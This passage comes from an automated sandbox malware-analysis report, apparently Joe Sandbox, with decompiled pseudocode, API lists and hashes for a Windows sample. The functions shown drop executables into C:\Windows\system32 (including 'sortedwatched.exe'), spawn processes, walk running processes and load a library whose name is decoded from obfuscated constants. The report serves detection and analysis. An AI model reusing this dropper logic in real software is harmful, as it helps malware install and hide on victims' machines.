                  • API String ID: 1860464474-3103284439
                  • Opcode ID: d21df1483eba43348c9a81eeec635097a7c991d75f1891da6298b92e764e64ff
                  • Instruction ID: aef8b5b249e02084cc47ae1663e45d8d954b77272b63b26d03dd396773520d47
                  • Opcode Fuzzy Hash: d21df1483eba43348c9a81eeec635097a7c991d75f1891da6298b92e764e64ff
                  • Instruction Fuzzy Hash: BA11867290011D9BDF21EB60DD05AEEB378EF44305F1044BAE905B21E1EB749F54CB98
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00401CC2, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 50processUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 61%
                  			E00401CC2(WCHAR* __ecx, WCHAR* __edx, intOrPtr _a8) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v88;
				void* _t22;

				_t22 = 0x44;
				E00401503( &_v88, _t22);
				_v88.cb = 0x44;
				if(CreateProcessW(__ecx, __edx, 0, 0, 0, 0, 0, 0,  &_v88,  &_v20) == 0) {
					return 0;
				}
				if(_a8 == 0) {
					CloseHandle(_v20);
					CloseHandle(_v20.hThread);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				return 1;
			}






                  0x00401cd0
                  0x00401cd4
                  0x00401cdc
                  0x00401cfa
                  0x00000000
                  0x00401d23
                  0x00401d01
                  0x00401d12
                  0x00401d1b
                  0x00401d03
                  0x00401d06
                  0x00401d07
                  0x00401d08
                  0x00401d09
                  0x00401d09
                  0x00000000

                  APIs
                  • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00401CF2
                  • CloseHandle.KERNEL32(?), ref: 00401D12
                  • CloseHandle.KERNEL32(0040F136), ref: 00401D1B
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandle$CreateProcess
                  • String ID: D$M vu
                  • API String ID: 2922976086-427032030
                  • Opcode ID: f759c0c4d4faa4ab7e3fcb7eaa698f336a99b085e6c1dbc9a5cb9a13423961d3
                  • Instruction ID: 78a74d64e74da198333939fe1c260d8d1ae2390c954a34ff9c8bd1b4990b218a
                  • Opcode Fuzzy Hash: f759c0c4d4faa4ab7e3fcb7eaa698f336a99b085e6c1dbc9a5cb9a13423961d3
                  • Instruction Fuzzy Hash: D7F0A472900108ABDB12DFA5DC04AEFB7BDEF45712B108036F916F71A0EB78AD058694
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040F292, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 29UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 82%
                  			E0040F292() {
				void* _t3;
				void* _t7;
				void* _t10;
				void* _t15;
				void* _t18;
				void* _t19;

				if( *0x415f4c == 0) {
					E0040F227();
				} else {
					E0040F214();
				}
				E00401503(0x416840, 0x104);
				_t3 = E00401A52(0x412bb0, 0x4bf67e71);
				_t19 = _t3;
				 *0x4143a4(0x416840, 0x104, _t19, "C:\Windows\system32", "sortedwatched", _t15, _t18, _t7);
				_t10 = _t19;
				return HeapFree(GetProcessHeap(), 0, _t10);
			}









                  0x0040f299
                  0x0040f2a2
                  0x0040f29b
                  0x0040f29b
                  0x0040f29b
                  0x0040f2b8
                  0x0040f2c7
                  0x0040f2d6
                  0x0040f2db
                  0x0040f2e4
                  0x00401542

                  APIs
                  • _snwprintf.NTDLL ref: 0040F2DB
                    • Part of subcall function 0040F214: SHGetFolderPathW.SHELL32(00000000,00000029,00000000,00000000,C:\Windows\system32), ref: 0040F220
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: FolderPath_snwprintf
                  • String ID: C:\Windows\system32$C:\Windows\system32\sortedwatched.exe$g8Cw$sortedwatched
                  • API String ID: 3078599568-3932404036
                  • Opcode ID: 732ce19849883ad6b6ae5baab8f4a74ee0b3467da4a84f7d802fc72968657f34
                  • Instruction ID: e972b69ea5731f996dd58b1a7c700a453acaa9277561cdf85d49239cb67cc4b6
                  • Opcode Fuzzy Hash: 732ce19849883ad6b6ae5baab8f4a74ee0b3467da4a84f7d802fc72968657f34
                  • Instruction Fuzzy Hash: D4E022203000106BC2207286AC457FB114ACBC2399B2180BFF90AB62D2CA7D8C06C37E
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040F227, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 50%
                  			E0040F227() {
				void* _t3;
				void* _t8;
				void* _t10;
				void* _t13;
				void* _t14;

				 *0x414c14(0, 0x1c, 0, 0, 0x416a48, _t10, _t13);
				_t3 = E00401A52(0x412df0, 0x4bf67e71);
				_t14 = _t3;
				 *0x4143a4(0x416a48, 0x104, _t14, 0x416a48, "sortedwatched");
				_t8 = _t14;
				return HeapFree(GetProcessHeap(), 0, _t8);
			}








                  0x0040f236
                  0x0040f246
                  0x0040f251
                  0x0040f25a
                  0x0040f263
                  0x00401542

                  APIs
                  • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,C:\Windows\system32), ref: 0040F236
                  • _snwprintf.NTDLL ref: 0040F25A
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: FolderPath_snwprintf
                  • String ID: C:\Windows\system32$g8Cw$sortedwatched
                  • API String ID: 3078599568-1150327775
                  • Opcode ID: 627380aad95ed75aaa38f20ecc9f6b9bc813d9b0073c6a6a7e394f29e60d905e
                  • Instruction ID: 86e21f4e142f409bbdd5896e6b5cbe9030aa6b7bc5bdc0fcc4a87da7cf4bd144
                  • Opcode Fuzzy Hash: 627380aad95ed75aaa38f20ecc9f6b9bc813d9b0073c6a6a7e394f29e60d905e
                  • Instruction Fuzzy Hash: 9FE0CD717401107BD31062656D09EF7695DDBD1FA1712403EBE0AE71D1E5748C41C27D
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00408922, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 120libraryUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 81%
                  			E00408922(void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				intOrPtr _v352;
				intOrPtr _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				intOrPtr _v376;
				intOrPtr _v380;
				intOrPtr _v384;
				char _v388;

				_v388 = 0xbe363562;
				_v384 = 0x358c1795;
				_v380 = 0xfc3978bd;
				_v376 = 0x5e88d697;
				_v372 = 0x1994d9f1;
				_v368 = 0x74012195;
				_v364 = 0x24e0d58c;
				_v360 = 0x21725a8d;
				_v356 = 0xa874821;
				_v352 = 0x8f4bb96f;
				_v348 = 0x7b30fa17;
				_v344 = 0x7ea7edad;
				_v340 = 0x48c44d52;
				_v336 = 0x2e75da4f;
				_v332 = 0x5ea70e4c;
				_v328 = 0x7310b874;
				_v324 = 0x673afa7a;
				_v320 = 0x7d7fe55;
				_v316 = 0x71d3ba3c;
				_v312 = 0x27174315;
				_v308 = 0xffc65c5a;
				_v304 = 0x71edd81f;
				_v300 = 0x88b5759d;
				_v296 = 0xa46eb22d;
				_v292 = 0x4e080454;
				_v288 = 0x773882f0;
				_v284 = 0x301340;
				_v280 = 0x27b6a846;
				_v276 = 0xd1630644;
				_v272 = 0x4beaf5bf;
				_v268 = 0x430858d;
				_v264 = 0xf02d0ada;
				_v260 = 0x21f77905;
				_v256 = 0xebc6db18;
				_v252 = 0x25fcc715;
				_v248 = 0x1f40551f;
				_v244 = 0xd9b12e44;
				_v240 = 0x41ea523d;
				_v236 = 0xeff774de;
				_v232 = 0x7e0b9da5;
				_v228 = 0x8adb486a;
				_v224 = 0xf7243b6d;
				_v220 = 0x2b80910;
				_v216 = 0xca5e3015;
				_v212 = 0x635d5a6e;
				_v208 = 0x46d9f790;
				_v204 = 0xd87c8cb3;
				_v200 = 0x3b391a04;
				_v196 = 0x80154553;
				_v192 = 0x26d9aa35;
				_v188 = 0xa780316d;
				_v184 = 0xcc58666d;
				_v180 = 0x1546d742;
				_v176 = 0xb874fe62;
				_v172 = 0x7dab30d9;
				_v168 = 0xae3670f3;
				_v164 = 0x2d39e7a8;
				_v160 = 0xc90b32b4;
				_v156 = 0xf86c708b;
				_v152 = 0x3d938887;
				_v148 = 0x857eaf68;
				_v144 = 0x4675d760;
				_v140 = 0x91021cb0;
				_v136 = 0x1e139331;
				_v132 = 0x9c4df91c;
				_v128 = 0xbf70c7da;
				_v124 = 0x1868d50e;
				_v120 = 0xaaeeea7a;
				_v116 = 0x676c626a;
				_v112 = 0x459ef5d;
				_v108 = 0xf6552739;
				_v104 = 0x628c522d;
				_v100 = 0x5094f550;
				_v96 = 0xdc8a394;
				_v92 = 0x753b5f8f;
				_v88 = 0xbcfd75c5;
				_v84 = 0xc39d1db2;
				_v80 = 0xfc32ffd;
				_v76 = 0xd8b5f26a;
				_v72 = 0xad049b88;
				_v68 = 0xaacdb83e;
				_v64 = 0x7a9519fc;
				_v60 = 0xa3bb9731;
				_v56 = 0x4be3cd7a;
				_v52 = 0xeb2ea36c;
				_v48 = 0xec09d4a5;
				_v44 = 0xf4140a91;
				_v40 = 0xb1a460b0;
				_v36 = 0x6fde7de0;
				_v32 = 0x1da135a9;
				_v28 = 0x1a3a8662;
				_v24 = 0xfe2095d7;
				_v20 = 0xf2fd9e2f;
				_v16 = 0xe2f8a12;
				_v12 = 0x2f79a8a3;
				_v8 = 0x33205105;
				_t107 = E00401A52(0x412780, 0x72fc3a35);
				 *0x4164f0 = LoadLibraryW(_t98);
				L00401B09(_t107);
				_push(0x413660);
				_push(0x3ccd278a);
				return E004012FF( *0x4164f0,  &_v388, 0x60);
			}



































































































                  0x0040892c
                  0x00408936
                  0x00408940
                  0x0040894a
                  0x00408954
                  0x0040895e
                  0x00408968
                  0x00408972
                  0x0040897c
                  0x00408986
                  0x00408990
                  0x0040899a
                  0x004089a4
                  0x004089ae
                  0x004089b8
                  0x004089c2
                  0x004089cc
                  0x004089d6
                  0x004089e0
                  0x004089ea
                  0x004089f4
                  0x004089fe
                  0x00408a08
                  0x00408a12
                  0x00408a1c
                  0x00408a26
                  0x00408a30
                  0x00408a3a
                  0x00408a44
                  0x00408a4e
                  0x00408a58
                  0x00408a62
                  0x00408a6c
                  0x00408a76
                  0x00408a80
                  0x00408a8a
                  0x00408a94
                  0x00408a9e
                  0x00408aa8
                  0x00408ab2
                  0x00408abc
                  0x00408ac6
                  0x00408ad0
                  0x00408ada
                  0x00408ae4
                  0x00408aee
                  0x00408af8
                  0x00408b02
                  0x00408b0c
                  0x00408b16
                  0x00408b20
                  0x00408b2a
                  0x00408b34
                  0x00408b3e
                  0x00408b48
                  0x00408b52
                  0x00408b5c
                  0x00408b66
                  0x00408b70
                  0x00408b7a
                  0x00408b84
                  0x00408b8e
                  0x00408b98
                  0x00408ba2
                  0x00408bac
                  0x00408bb3
                  0x00408bba
                  0x00408bc1
                  0x00408bc8
                  0x00408bcf
                  0x00408bd6
                  0x00408bdd
                  0x00408be4
                  0x00408beb
                  0x00408bf2
                  0x00408bf9
                  0x00408c00
                  0x00408c07
                  0x00408c0e
                  0x00408c15
                  0x00408c21
                  0x00408c2d
                  0x00408c34
                  0x00408c3b
                  0x00408c42
                  0x00408c49
                  0x00408c50
                  0x00408c57
                  0x00408c5e
                  0x00408c65
                  0x00408c6c
                  0x00408c73
                  0x00408c7a
                  0x00408c81
                  0x00408c88
                  0x00408c8f
                  0x00408c9b
                  0x00408ca6
                  0x00408cab
                  0x00408cbc
                  0x00408cc1
                  0x00408cd4

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 00408C9E
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: =RA$jblg$nZ]c
                  • API String ID: 1029625771-130541845
                  • Opcode ID: 1b1ed6e085e12f066a49fdef08a2a82bb6068c6974effbf6941084d5ca8307fb
                  • Instruction ID: e7cc7c87ab767eb4a20ce2cf539689b4304f70dc4dd1bc1fd0241874581f8c7a
                  • Opcode Fuzzy Hash: 1b1ed6e085e12f066a49fdef08a2a82bb6068c6974effbf6941084d5ca8307fb
                  • Instruction Fuzzy Hash: 9081C6B4C06368DBEB21DF8699857CDBB70FB45704F6086C8C2693B214DB304A86CF99
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040F883, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38stringUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040F883(WCHAR* __ecx) {
				short _t21;
				short _t24;
				short _t25;
				WCHAR* _t27;
				short _t30;
				signed int _t32;
				signed int _t33;
				signed int _t34;
				void* _t37;

				_t27 = __ecx;
				lstrcpyW(__ecx, "C:\Windows\system32");
				_t32 = lstrlenW(_t27);
				_t21 = 0x5c;
				_t27[_t32] = _t21;
				_t33 = _t32 + 1;
				_t37 = (GetTickCount() & 0x0000000f) + 4;
				E00401E8F( &(_t27[_t33]), _t37);
				_t24 = 0x2e;
				_t34 = _t33 + _t37;
				_t30 = 0x65;
				_t27[_t34] = _t24;
				_t25 = 0x78;
				 *((short*)(_t27 + 2 + _t34 * 2)) = _t30;
				 *((short*)(_t27 + 4 + _t34 * 2)) = _t25;
				 *((short*)(_t27 + 6 + _t34 * 2)) = _t30;
				 *((short*)(_t27 + 8 + _t34 * 2)) = 0;
				return 0;
			}












                  0x0040f886
                  0x0040f88e
                  0x0040f89b
                  0x0040f89f
                  0x0040f8a0
                  0x0040f8a4
                  0x0040f8b3
                  0x0040f8b8
                  0x0040f8bf
                  0x0040f8c0
                  0x0040f8c4
                  0x0040f8c7
                  0x0040f8cb
                  0x0040f8cc
                  0x0040f8d1
                  0x0040f8d8
                  0x0040f8dd
                  0x0040f8e5

                  APIs
                  • lstrcpyW.KERNEL32(?,C:\Windows\system32), ref: 0040F88E
                  • lstrlenW.KERNEL32(?), ref: 0040F895
                  • GetTickCount.KERNEL32 ref: 0040F8A5
                    • Part of subcall function 00401E8F: GetTickCount.KERNEL32(00000001,-00000004,?), ref: 00401EA4
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CountTick$lstrcpylstrlen
                  • String ID: C:\Windows\system32
                  • API String ID: 1913473829-2896066436
                  • Opcode ID: f29303cca2c36e1e583c5a6cd85068ee6764875e66978048a0fb2f6fbe9387fb
                  • Instruction ID: fa4d6f9086d2f062a8c468281c34a08385031fd9eafdca72e636224e2a785f14
                  • Opcode Fuzzy Hash: f29303cca2c36e1e583c5a6cd85068ee6764875e66978048a0fb2f6fbe9387fb
                  • Instruction Fuzzy Hash: C9F0F6236583056BD7205FE0EC89A563725DF44762F15D0B6EC09EF6A6EB74C841C3A4
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040284F, Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 176UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 95%
                  			E0040284F(intOrPtr* __ecx) {
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t89;
				void* _t90;
				signed int _t92;
				signed int _t93;
				signed int _t101;
				signed int _t126;
				int* _t128;
				char _t133;
				signed int _t135;
				signed int _t136;
				void* _t137;
				intOrPtr _t139;
				signed int _t141;
				void* _t142;
				signed int _t145;
				intOrPtr* _t148;
				signed int _t152;
				int _t153;
				intOrPtr _t154;
				int _t155;
				void* _t156;

				_t148 = __ecx;
				_t142 = 8;
				if(__ecx == 0) {
					L22:
					_push(0xfffffffe);
					L23:
					_pop(_t89);
					return _t89;
				}
				_t128 =  *((intOrPtr*)(__ecx + 0x1c));
				if(_t128 == 0) {
					goto L22;
				}
				_t90 = 9;
				_t143 =  >  ? _t90 : _t142;
				_v20 =  *((intOrPtr*)(__ecx + 4));
				_t92 =  *(_t128 + 0x2af8);
				_v24 =  >  ? _t90 : _t142;
				 *(_t128 + 0x2af8) = 0;
				if( *(_t128 + 0xab04) >= 0) {
					 *(_t128 + 0x2afc) =  *(_t128 + 0x2afc) | 1;
					__eflags = _t92;
					if(_t92 == 0) {
						_t93 =  *(_t128 + 0x2af4);
						__eflags = _t93;
						if(_t93 == 0) {
							while(1) {
								_t131 =  *(_t128 + 0x2af0);
								_v8 =  *((intOrPtr*)(_t148 + 4));
								_v12 = 0x8000 -  *(_t128 + 0x2af0);
								_t101 = E00404AD4(_t128,  *_t148,  &_v8, _t128 + 0x2b04, _t128 + 0x2b04 + _t131,  &_v12, _t143);
								_t133 = _v8;
								 *(_t128 + 0xab04) = _t101;
								 *_t148 =  *_t148 + _t133;
								 *((intOrPtr*)(_t148 + 4)) =  *((intOrPtr*)(_t148 + 4)) - _t133;
								 *((intOrPtr*)(_t148 + 8)) =  *((intOrPtr*)(_t148 + 8)) + _t133;
								 *((intOrPtr*)(_t148 + 0x30)) =  *((intOrPtr*)(_t128 + 0x1c));
								_t135 = _v12;
								 *(_t128 + 0x2af4) = _t135;
								_t152 =  *(_t148 + 0x10);
								__eflags = _t135 - _t152;
								_v16 = _t101;
								_t153 =  <  ? _t135 : _t152;
								memcpy( *(_t148 + 0xc),  *(_t128 + 0x2af0) + 0x2b04 + _t128, _t153);
								 *(_t148 + 0xc) =  *(_t148 + 0xc) + _t153;
								_t156 = _t156 + 0x20;
								 *(_t148 + 0x10) =  *(_t148 + 0x10) - _t153;
								 *((intOrPtr*)(_t148 + 0x14)) =  *((intOrPtr*)(_t148 + 0x14)) + _t153;
								 *(_t128 + 0x2af4) =  *(_t128 + 0x2af4) - _t153;
								_t136 = _v16;
								_t145 =  *(_t128 + 0x2af4);
								 *(_t128 + 0x2af0) =  *(_t128 + 0x2af0) + _t153 & 0x00007fff;
								__eflags = _t136;
								if(_t136 < 0) {
									goto L3;
								}
								__eflags = _t136 - 1;
								if(_t136 != 1) {
									L18:
									__eflags = _t136;
									if(_t136 == 0) {
										__eflags = _t145;
										_t137 = 0xfffffffb;
										_t111 =  !=  ? _t137 : 1;
										return  !=  ? _t137 : 1;
									}
									__eflags =  *(_t148 + 0x10);
									if( *(_t148 + 0x10) == 0) {
										L8:
										_push(0xfffffffb);
										goto L23;
									}
									_t143 = _v24;
									continue;
								}
								__eflags = _v20;
								if(_v20 == 0) {
									goto L8;
								}
								goto L18;
							}
							goto L3;
						}
						_t154 =  *((intOrPtr*)(__ecx + 0x10));
						__eflags = _t93 - _t154;
						_t155 =  <  ? _t93 : _t154;
						memcpy( *(__ecx + 0xc),  *(_t128 + 0x2af0) + 0x2b04 + _t128, _t155);
						 *(_t148 + 0xc) =  *(_t148 + 0xc) + _t155;
						 *(_t148 + 0x10) =  *(_t148 + 0x10) - _t155;
						 *((intOrPtr*)(_t148 + 0x14)) =  *((intOrPtr*)(_t148 + 0x14)) + _t155;
						 *(_t128 + 0x2af4) =  *(_t128 + 0x2af4) - _t155;
						__eflags =  *(_t128 + 0xab04);
						 *(_t128 + 0x2af0) =  *(_t128 + 0x2af0) + _t155 & 0x00007fff;
						if( *(_t128 + 0xab04) != 0) {
							L14:
							return 0;
						}
						__eflags =  *(_t128 + 0x2af4);
						if( *(_t128 + 0x2af4) != 0) {
							goto L14;
						}
						return 1;
					}
					_v8 =  *((intOrPtr*)(__ecx + 4));
					_v12 =  *((intOrPtr*)(__ecx + 0x10));
					_t126 = E00404AD4(_t128,  *__ecx,  &_v8,  *(__ecx + 0xc),  *(__ecx + 0xc),  &_v12, _t143 | 0x00000004);
					_t139 = _v8;
					 *(_t128 + 0xab04) = _t126;
					 *__ecx =  *__ecx + _t139;
					 *((intOrPtr*)(__ecx + 4)) =  *((intOrPtr*)(__ecx + 4)) - _t139;
					 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(__ecx + 8)) + _t139;
					 *((intOrPtr*)(__ecx + 0x30)) =  *((intOrPtr*)(_t128 + 0x1c));
					_t141 = _v12;
					 *(__ecx + 0xc) =  *(__ecx + 0xc) + _t141;
					 *((intOrPtr*)(__ecx + 0x10)) =  *((intOrPtr*)(__ecx + 0x10)) - _t141;
					 *((intOrPtr*)(__ecx + 0x14)) =  *((intOrPtr*)(__ecx + 0x14)) + _t141;
					__eflags = _t126;
					if(__eflags < 0) {
						goto L3;
					}
					if(__eflags == 0) {
						return 1;
					}
					_t34 = _t128 + 0xab04;
					 *_t34 =  *(_t128 + 0xab04) | 0xffffffff;
					__eflags =  *_t34;
					goto L8;
				}
				L3:
				_push(0xfffffffd);
				goto L23;
			}





























                  0x00402858
                  0x0040285c
                  0x0040285f
                  0x00402a69
                  0x00402a69
                  0x00402a6b
                  0x00402a6b
                  0x00000000
                  0x00402a6b
                  0x00402865
                  0x0040286a
                  0x00000000
                  0x00000000
                  0x0040287a
                  0x0040287b
                  0x00402881
                  0x00402884
                  0x0040288a
                  0x0040288d
                  0x00402899
                  0x004028a5
                  0x004028ab
                  0x004028ad
                  0x00402917
                  0x0040291d
                  0x0040291f
                  0x00402987
                  0x00402990
                  0x00402996
                  0x004029a0
                  0x004029ba
                  0x004029bf
                  0x004029c2
                  0x004029c8
                  0x004029ca
                  0x004029cd
                  0x004029d3
                  0x004029d6
                  0x004029d9
                  0x004029df
                  0x004029e2
                  0x004029e4
                  0x004029ed
                  0x004029fc
                  0x00402a02
                  0x00402a05
                  0x00402a08
                  0x00402a0b
                  0x00402a14
                  0x00402a1c
                  0x00402a24
                  0x00402a2a
                  0x00402a30
                  0x00402a32
                  0x00000000
                  0x00000000
                  0x00402a3b
                  0x00402a3d
                  0x00402a49
                  0x00402a49
                  0x00402a4b
                  0x00402a61
                  0x00402a63
                  0x00402a64
                  0x00000000
                  0x00402a64
                  0x00402a4d
                  0x00402a51
                  0x00402909
                  0x00402909
                  0x00000000
                  0x00402909
                  0x00402a57
                  0x00000000
                  0x00402a57
                  0x00402a3f
                  0x00402a43
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00402a43
                  0x00000000
                  0x00402987
                  0x00402921
                  0x00402924
                  0x00402926
                  0x0040293b
                  0x00402941
                  0x00402947
                  0x0040294a
                  0x00402953
                  0x00402960
                  0x00402967
                  0x0040296d
                  0x00402980
                  0x00000000
                  0x00402980
                  0x0040296f
                  0x00402976
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040297a
                  0x004028b5
                  0x004028c0
                  0x004028d1
                  0x004028d6
                  0x004028dc
                  0x004028e2
                  0x004028e4
                  0x004028e7
                  0x004028ed
                  0x004028f0
                  0x004028f3
                  0x004028f6
                  0x004028f9
                  0x004028fc
                  0x004028fe
                  0x00000000
                  0x00000000
                  0x00402900
                  0x00000000
                  0x00402910
                  0x00402902
                  0x00402902
                  0x00402902
                  0x00000000
                  0x00402902
                  0x0040289b
                  0x0040289b
                  0x00000000

                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 0HCw$Ab@
                  • API String ID: 0-707421244
                  • Opcode ID: 33f034056c3a3427ec488e59f39741281436f7c45068a44fc4d7b3f08e725971
                  • Instruction ID: 085e4857d5f96ebe99bd6dbc6265157c6608e9d95e27a4949ae474babd6914cb
                  • Opcode Fuzzy Hash: 33f034056c3a3427ec488e59f39741281436f7c45068a44fc4d7b3f08e725971
                  • Instruction Fuzzy Hash: 7A618171B00606AFCB58CF69CA88996B3B4FF04314F14827ADC19DB6C5DB78A950CF95
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00401943, Relevance: 6.0, APIs: 4, Instructions: 37processCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00401943(void* __edx) {
				void* _v560;
				void* _t5;
				struct tagPROCESSENTRY32W* _t6;
				void* _t12;
				void* _t13;

				_t12 = __edx;
				_t5 = CreateToolhelp32Snapshot(2, 0);
				_t13 = _t5;
				if(_t13 != 0xffffffff) {
					_t6 =  &_v560;
					_v560 = 0x22c;
					Process32FirstW(_t13, _t6);
					while(_t6 != 0 && E00402255( &_v560, _t12) != 0) {
						_t6 = Process32NextW(_t13,  &_v560);
					}
					return CloseHandle(_t13);
				}
				return _t5;
			}








                  0x00401952
                  0x00401954
                  0x0040195a
                  0x0040195f
                  0x00401961
                  0x00401967
                  0x00401973
                  0x00401989
                  0x00401983
                  0x00401983
                  0x00000000
                  0x0040199f
                  0x004019aa

                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00401954
                  • Process32FirstW.KERNEL32(00000000,?), ref: 00401973
                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00401983
                  • CloseHandle.KERNEL32(00000000), ref: 0040199F
                    • Part of subcall function 00402255: GetCurrentProcessId.KERNEL32(0040C6D4,00000000,?,?,0040199A,0000022C,0040C6D4), ref: 00402273
                    • Part of subcall function 00402255: GetCurrentProcessId.KERNEL32(?,0040199A,0000022C,0040C6D4), ref: 00402284
                    • Part of subcall function 00402255: lstrcpyW.KERNEL32(00000004,0000022C), ref: 004022B6
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentProcessProcess32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
                  • String ID:
                  • API String ID: 210870473-0
                  • Opcode ID: 32a748f4d19bd9fcb3bffcca5a552f4bc6dc848702525874167d515a2f84efd4
                  • Instruction ID: 16848b0ed7bca5f6eaa718ca54d67b5e4b9d7aaec9667f6a8c5e1db911b667c7
                  • Opcode Fuzzy Hash: 32a748f4d19bd9fcb3bffcca5a552f4bc6dc848702525874167d515a2f84efd4
                  • Instruction Fuzzy Hash: 93F096715011287AD720AB79AC0CFEF7B7CDB49711F1081B2ED05F21D0D7388A058A99
                  Uniqueness

                  Uniqueness Score: 0.04%

                  Function 00405FA4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 91%
                  			E00405FA4(void* __ecx, intOrPtr* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr* _v8;
				void* _t28;
				void* _t44;
				void* _t45;
				intOrPtr _t46;
				signed int _t56;
				void* _t78;
				void* _t84;
				void* _t86;
